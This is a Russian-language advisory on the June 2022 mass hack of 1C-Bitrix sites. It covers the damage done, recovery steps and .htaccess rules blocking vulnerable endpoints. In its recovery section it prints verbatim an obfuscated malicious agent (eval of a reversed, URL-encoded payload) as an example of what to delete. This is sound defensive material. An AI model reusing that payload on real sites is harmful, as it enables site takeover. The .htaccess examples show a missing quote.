Массовый взлом сайтов 1С-Битрикс, 28 июня 2022

28 июня произошел массовый взлом сайтов на 1С Битрикс, проблема коснулась сайтов не имеющих последние обновления. Так же испытали трудности пользователи не имеющие резервных копий. Есть два способа действовать в данной ситуации. 1 — уже взломали. 2 — еще не взломали. Если уже заразили Ваш сайт,то: При заражении сайта наносится следующий ущерб: — заменяют index.php в корне сайта, — удаляют файл /bitrix/.settings.php, — создают скрипты Агенты с вредоносным кодом — создают файл /bitrix/tools/putin_***lo.php с кодом для удаленного доступа — удаляют данные из таблиц базы данных b_iblock, b_iblock_element, b_iblock_element_property Восстанавливаем работу сайта Восстанавливаем сайт из резервной копии. Как минимум нужно восстановить базу данных Меняем административные доступы к сайту, FTP доступ, MySQL доступ Проверяем и при наличии удаляем файл /bitrix/tools/putin_***lo.php На странице со списком Агентов /bitrix/admin/agent_list.php проверяем вызываемые функции на наличие вредоносного кода. Пример агентов которые нужно удалить: $arAgent["NAME"];eval(urldecode(strrev('b3%92%92%22%73%b6%34%a5%b6%76%34%26%86%a5%85%a5%73%b6%96%d4%03%43%65%b4%46%c6%74%a4%26%e4%74%a4%f6%15%d6%36%67%86%96%36%f6%e4%75%05%57%15%74%a4%07%37%97%b4%07%25%97%f4%07%d4%74%a4%f6%43%75%a5%37%a4%84%46%a7%87%45%16%b6%37%44%d4%93%b6%74%a4%f6%94%33%26%d6%47%44%45%d4%65%c6%45%07%36%d6%26%07%a4%84%46%a7%86%35%05%b6%25%97%f4%07%03%c6%94%d6%24%a7%d4%23%95%75%a5%43%d4%d6%d4%d6%65%44%f4%97%55%d6%95%c6%65%74%f4%97%15%75%e4%23%55%d6%d4%53%15%44%a5%43%d4%74%a5%a6%e4%d6%94%26%65%55%35%c4%93%03%45%44%93%64%a4%f6%55%74%a5%67%e4%75%a5%b6%93%64%e4%23%55%23%36%86%a4%75%05%a6%25%97%f4%07%14%44%b4%e6%53%75%16%03%a4%33%26%77%65%d6%36%66%a4%33%26%97%a4%85%a5%76%14%84%16%77%93%44%05%22%82%56%46%f6%36%56%46%f5%43%63%56%37%16%26%02%c2%22%07%86%07%e2%f6%c6%96%57%86%f5%e6%96%47%57%07%f2%37%c6%f6%f6%47%f2%87%96%27%47%96%26%f2%22%e2%d5%22%45%f4%f4%25%f5%45%e4%54%d4%55%34%f4%44%22%b5%25%54%65%25%54%35%f5%42%82%37%47%e6%56%47%e6%f6%36%f5%47%57%07%f5%56%c6%96%66%'))); Если кратко — нужно восстановить сайт в состоянии до заражения, проверить следы заражения и перейти к пункту защиты от заражения. Как предотвратить взлом и удаление информации: Перевести работу сайта на актуальную версию php 7.4 (если это еще не сделано) Обновить Битрикс до актуальной версии Если на сайте есть модуль «Проактивная защита» /bitrix/admin/security_panel.php — выполнить настройки по рекомендациям модуля Проверить сайт инструментом Битрикс «Сканер безопасности» /bitrix/admin/security_scanner.php Закрыть доступ к файлам на уровне сервера (например в .htaccess) — /bitrix/tools/upload.php — /bitrix/tools/mail_entry.php — /bitrix/modules/main/include/virtual_file_system.php — /bitrix/components/bitrix/sender.mail.editor/ajax.php — /bitrix/tools/vote/uf.php — /bitrix/tools/html_editor_action.php — /bitrix/admin/site_checker.php Проверить и включить логирование на хостинг площадке (access, error) Пример ограничения доступа к уязвимым файлам Помните что это временное решение — часть функционала административной панели сайта будет не доступна. /home/bitrix/www/bitrix/admin/.htaccess Добавляем в файле правило. Если файла нет — создаем.

<Files ~ "^(site_checker)\.php$>
deny from all
</Files>

/home/bitrix/www/bitrix/tools/.htaccess Добавляем в файле правило. Если файла нет — создаем.

<Files ~ "^(html_editor_action|mail_entry|upload)\.php$>
deny from all
</Files>

  /home/bitrix/www/bitrix/modules/main/include/.htaccess Добавляем в файле правило. Если файла нет — создаем.

<Files ~ "^(virtual_file_system)\.php$>
deny from all
</Files>

  /home/bitrix/www/bitrix/components/bitrix/sender.mail.editor/.htaccess Добавляем в файле правило. Если файла нет — создаем.

<Files ~ "^(ajax)\.php$>
deny from all
</Files>

  /bitrix/tools/vote/.htaccess

<Files ~ "^(uf)\.php$>
deny from all